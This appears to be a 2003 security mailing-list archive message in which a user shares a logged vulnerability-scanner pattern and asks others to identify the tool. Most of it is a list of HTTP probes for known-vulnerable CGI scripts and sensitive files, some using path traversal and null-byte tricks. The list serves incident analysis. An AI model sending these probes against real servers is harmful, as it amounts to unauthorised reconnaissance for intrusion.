>HEAD /piranha/secure/passwd.php3 HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/perlshop.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/pfdisplay.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/phf HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/phf.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/php HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/php.cgi HTTP/1.0\x0a\x0a
>HEAD /phpgroupware/inc/phpgwapi/phpgw.inc.php HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/plusmail HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/bin/ls%00 HTTP/1.0
>\x0a\x0a
>HEAD /cgi-bin/postings.cgi?
>action=reply&forum=&number=1&topic=000001.cgi&TopicSubject=&replyto=0 
>HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/post-query HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/processit.pl HTTP/1.0\x0a\x0a
>HEAD /PSUser/PSCOErrPage.htm HTTP/1.0\x0a\x0a
>HEAD /pservlet.html HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/ipf/etc/gfw/ui/pwd.dat HTTP/1.0\x0a\x0a
>HEAD /Newuser?Image=../../database/rbsserv.mdb HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/redirect.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/register.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/responder.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/rpm_query HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/rwwwshell.pl HTTP/1.0\x0a\x0a
>HEAD /sawmill HTTP/1.0\x0a\x0a
>HEAD /scancfg.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/search.cgi?letter= HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/Search.pl HTTP/1.0\x0a\x0a
>HEAD /ROADS/cgi-bin/search.pl HTTP/1.0\x0a\x0a
>HEAD /inc/sendmail.inc HTTP/1.0\x0a\x0a
>HEAD /setpasswd.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/simplestguest.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/simplestmail.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.0\x0a\x0a
>HEAD /html/snort2html.html HTTP/1.0\x0a\x0a
>HEAD /snort2html.html HTTP/1.0\x0a\x0a
>HEAD /site/eg/source.asp HTTP/1.0\x0a\x0a
>HEAD /secret/secret/sql_tool.shtml HTTP/1.0\x0a\x0a
>HEAD /cd-cgi/sscd_suncourier.pl HTTP/1.0\x0a\x0a
>HEAD /stat.htm HTTP/1.0\x0a\x0a
>HEAD /stats.htm HTTP/1.0\x0a\x0a
>HEAD /stats.html HTTP/1.0\x0a\x0a
>HEAD /stats.txt HTTP/1.0\x0a\x0a
>HEAD /scripts/submit.cgi HTTP/1.0\x0a\x0a
>HEAD /users/scripts/submit.cgi HTTP/1.0\x0a\x0a
>HEAD /submit.php?CONF=anything HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/subscribe.pl HTTP/1.0\x0a\x0a
>HEAD /subscribe.pl?testat_private HTTP/1.0\x0a\x0a
>HEAD /survey HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/survey.cgi HTTP/1.0\x0a\x0a
>HEAD /technote/main.cgi/oops?
>board=FREE_BOARD&command=down_load&filename=/../../../main.cgi HTTP/1.0
>\x0a\x0a
>HEAD /technote/print.cgi HTTP/1.0\x0a\x0a
>HEAD /test/test.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/test-cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/textcounter.pl HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/search/tidfinder.cgi?2956734 HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/ultraboard.cgi HTTP/1.0\x0a\x0a
>HEAD /ultraboard.pl HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/unlg1.1 HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/unlg1.2 HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/upload_file.pl HTTP/1.0\x0a\x0a
>HEAD /user.php&op=saveuser HTTP/1.0\x0a\x0a
>HEAD /cgi-auth/userreg.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/ustorekeeper.pl HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/view_page.html HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/view-source HTTP/1.0\x0a\x0a
>HEAD /search97cgi/vtopic HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/w3-msql HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/wais.pl HTTP/1.0\x0a\x0a
>HEAD /way-board/way-board.cgi HTTP/1.0\x0a\x0a
>HEAD /webaccess.htm HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/webdata.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/webdist.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/webdriver HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/webgais HTTP/1.0\x0a\x0a
>HEAD //WEB-INF/ HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/replicator/webpage.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/webplus.cgi?Script=/webplus/webping/webping.wml HTTP/1.0
>\x0a\x0a
>HEAD /cgi-bin/websendmail HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/webspirs.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/webwho.pl HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/scripts/whois.cgi?action=load&whois=check HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/whois_raw.cgi HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/wrap.cgi HTTP/1.0\x0a\x0a
>HEAD /WSFTP.LOG HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/wwwboard.pl HTTP/1.0\x0a\x0a
>HEAD /cgi-bin/www-sql HTTP/1.0\x0a\x0a
>OPTIONS / HTTP/1.1\x0d\x0atranslate: f\x0d\x0aUser-Agent: Microsoft-
>WebDAV-MiniRedir/5.1.2600\x0d\x0aHost: 159.37.8.1\x0d\x0aContent-Length: 0
>\x0d\x0aConnection: Keep-Alive\x0d\x0a\x0d\x0a
>SEARCH / HTTP/1.0\x0d\x0a\x0d\x0a
>
>Thanks for any leads,
>Dean
>
>----------------------------------------------------------------------------
>Powerful Anti-Spam Management and More...
>SurfControl E-mail Filter puts the brakes on spam,
>viruses and malicious code. Safeguard your business
>critical communications. Download a free 30-day trial:
>http://www.securityfocus.com/SurfControl-incidents
>
>
>  
>




<b>
----------------------------------------------------------------------------
Is SPAM over-loading your e-mail server, disk space or bandwidth?
SurfControl E-Mail Filter is flexible, intelligent and policy-driven
protection.
http://www.securityfocus.com/SurfControl-incidents2
Download your free fully functional
trial, complete with 30-days of free technical support.
Stop SPAM before it stops you.
----------------------------------------------------------------------------
</b>
Next message: Joe Stewart: "ATD OpenSSL Mass Exploiter Analysis (another "/sumthin" scan tool)"
Previous message: deanat_private: "Re: Does anyone recognize the scanner that causes this pattern ?"
In reply to: deanat_private: "Does anyone recognize the scanner that causes this pattern ?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This archive was generated by hypermail 2b30 : Mon Apr 07 2003 - 15:49:51 PDT